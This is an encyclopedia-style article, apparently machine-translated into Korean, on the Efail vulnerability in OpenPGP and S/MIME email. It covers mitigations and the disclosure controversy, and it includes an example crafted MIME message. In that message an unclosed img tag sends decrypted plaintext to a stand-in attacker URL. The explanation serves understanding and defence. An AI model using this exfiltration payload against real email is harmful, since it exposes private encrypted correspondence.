이파일
EFAILEFAIL도 작성된 Efail은 이메일 시스템의 보안 구멍으로, 암호화된 형태로 콘텐츠를 전송할 수 있다. 이 간격은 공격자가 HTML이나[1] JavaScript와 같은 활성 콘텐츠가 포함되어 있거나 클라이언트에서 외부 콘텐츠 로드가 활성화된 경우 전자 메일의 암호 해독된 콘텐츠에 액세스할 수 있게 해준다. 영향을 받는 이메일 클라이언트에는 Gmail, Apple Mail, Microsoft Outlook이 포함된다.[1]
두 가지 관련 일반 취약성 및 노출 ID, CVE-2017-17688 및 CVE-2017-17689가 발행되었다. The security gap was made public on 13 May 2018 by Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky and Jörg Schwenk as part of a contribution to the 27th USENIX Security Symposium, Baltimore, August 2018.
이 취약성의 결과로 공격받은 암호화된 전자 메일의 내용은 취약한 전자 메일 클라이언트에 의해 공격자에게 일반 텍스트로 전송될 수 있다. 사용한 암호키는 공개되지 않는다.
설명
보안 격차는 전자 메일 암호화 시스템 OpenPGP 및 S/MIME과 함께 사용될 때 많은 일반적인 전자 메일 프로그램과 관련이 있다. 공격자는 공격된 전자 메일 메시지에 암호화된 형태로 액세스할 수 있어야 하며, 이 원본 전자 메일의 일반 수신자 한 명에게 전자 메일을 보낼 수 있어야 한다. 보안 격차를 이용하기 위해 공격자는 암호화된 전자 메일을 수정하여 수신자의 전자 메일 프로그램이 전자 메일의 암호 해독된 내용을 공격자에게 전송하도록 한다.
암호화된 전자 메일의 암호 해독된 내용에 액세스하려면 공격자가 준비한 텍스트를 포함하도록 공격 대상 전자 메일을 수정하십시오. 그런 다음 공격자는 변경된 전자 메일을 일반 수신자 중 한 명에게 전송한다.
공격자는 암호화된 전자 메일에 암호화된 텍스트의 앞뒤에 추가 텍스트를 삽입하여 메시지를 변경하여 멀티파트/혼합(MIME) 메시지가 생성되고 메시지의 암호화된 부분이 HTML 태그의 매개변수 값으로 MIME 메시지의 한계 표시와 함께 나타나도록 한다.
수정된 S/MIME 메일의 예:
[...] 내용유형: 멀티파트/혼합;경계="BOUNDARY" [...] --BOUNDARY Content-Type: text/html <img src="http://attacker.chosen.url/ --BOUNDARY Content-Type: application/pkcs7-mime; s-mime-typed-envelope-data Content-Transfer-Encoding: base64 ENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGE --BOUNDARY Content-Type: text/html "> --BOUNDARY ...
e-메일 클라이언트는 먼저 멀티파트 메시지를 다음 항목을 사용하여 개별 파트로 분해한다. --BOUNDARY
태그를 지정한 다음 암호화된 부분을 해독하십시오. 그런 다음 멀티파트 메시지를 재조립하고 다음과 같은 방식으로 메시지를 수신한다.
[...] 내용유형: 멀티파트/혼합;경계="경계" [...] --BOUNDARY Content-Type: text/html <img src="http://attacker.chosen.url/SECRECMESSAGESECMESSAGE" > --BUNDARY ...
이제 이 메시지는 에 있는 전자 메일의 암호 해독된 내용을 포함한다. src=
의 속성 <img>
태그를 지정하고 전자 메일 프로그램을 통해 웹 서버에 대한 URL로 전달됨 attacker.chosen.url
이 콘텐츠가 요청될 때 공격자가 제어한다. 이제 공격자는 웹 서버 로그에서 암호화된 메시지의 내용을 검색할 수 있다.
공격의 변종에서 공격자는 사용되는 암호화 알고리즘의 CBC(S/MIME) 및 CFB(OpenPGP) 작동 모드에 취약성을 이용한다. 이것은 그가 가젯을 삽입함으로써 암호문을 바꿀 수 있게 해준다. 이 조작의 부작용으로, 원래 포함된 일반 텍스트는 읽을 수 없게 된다. 이 사실이 알려지면 공격자는 추가 가젯을 삽입하여 이 문제를 해결할 수 있다. 공격자는 특정 HTML 태그를 삽입하여 알 수 없는 일반 텍스트를 숨길 수 있다. 그 결과는 위에서 설명한 것과 유사한 구조를 가진 메시지다.
완화
이 취약성은 전자 메일의 내용에 대한 것이 아니라 수신자에 대한 것이므로, 모든 수신자가 대응책을 이행할 필요가 있다. 여기에는 다음이 포함된다.
- 전자 메일을 볼 때 HTML 또는 JavaScript와 같은 활성 콘텐츠를 사용하지 않도록 설정하십시오.
- 영상과 같은 외부 콘텐츠의 자동 재로드 금지.
암호화된 콘텐츠의 송신자라도 취약성을 어느 정도까지 줄일 수 있는가에 대해서는, 예를 들면 전자서명에 의해서나 MIME 포맷의 서브셋에 대한 제한에 의해서도, 아직 확정적으로 명확하지 않았다.
비평
2018년 5월 13일 보안 취약성을 발표하면서 전자 프런티어 재단(EFF)은 취약성이 PGP와 직접 관련되지 않지만 전자 메일 프로그램의 PGP 플러그인 사용을 중지할 것을 권고했다.[2][3] 원래 5월 15일에 공동 출판이 예정되어 있었다. EFF는 여러 정당으로부터 이것을 무시했다는 비판을 받았다.[4][5][6][7][8]
그 결과, 로버트 한센은 향후 보안 문제의 출판을 더 잘 조정하기 위해 폐쇄적인 그룹이나 메일링 리스트를 만들 것을 권고했다. 그럼에도 그는 Eff와 이사인 Danny O'Brien을 그러한 "OpenPGP Disclosure Group"[9]을 관리할 수 있는 가장 좋은 기관으로 보았다.
참조
- ^ a b "Decade-old Efail flaws can leak plaintext of PGP- and S/MIME-encrypted emails". arstechnica.com.
- ^ "EFF on Twitter". Twitter. Electronic Frontier Foundation (EFF). 2018-05-13. Retrieved 2018-05-17.
To protect yourself, EFF highly recommends that for now you uninstall or disable your PGP email plug-in.
- ^ O'Brien, Danny; Gebhart, Gennie (2018-05-13), Attention PGP Users: New Vulnerabilities Require You To Take Action Now, Electronic Frontier Foundation (EFF), retrieved 2018-05-17
- ^ "Kommentar: Efail ist ein EFFail". heise online (in German). 2018-05-16. Retrieved 2018-05-17.
- ^ "Enigmail-Chefentwickler im Interview: Efail-Veröffentlichung war "unüberlegt"". heise security (in German). 2018-05-15. Retrieved 2018-05-17.
- ^ Koch, Werner (2018-05-14). "Efail or OpenPGP is safer than S/MIME". gnupg-users. Retrieved 2018-05-17.
- ^ Green, Matthew (2018-05-17). "Was the Efail disclosure horribly screwed up?". A Few Thoughts on Cryptographic Engineering. Retrieved 2018-05-17.
- ^ "Hashtag #EFFail auf Twitter" (in German). Retrieved 2018-05-17.
- ^ Hansen, Robert (2018-05-20). "Efail: A Postmortem". medium.com. Retrieved 2018-05-21.
추가 읽기
- Poddebniak, Damian; Dresen, Christian; Müller, Jens; Ising, Fabian; Schinzel, Sebastian; Friedberger, Simon; Somorovsky, Juraj; Schwenk, Jörg. "Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels" (PDF). Efail.de. Draft 0.9.1. Archived (PDF) from the original on 2018-05-21. Retrieved 2018-05-14.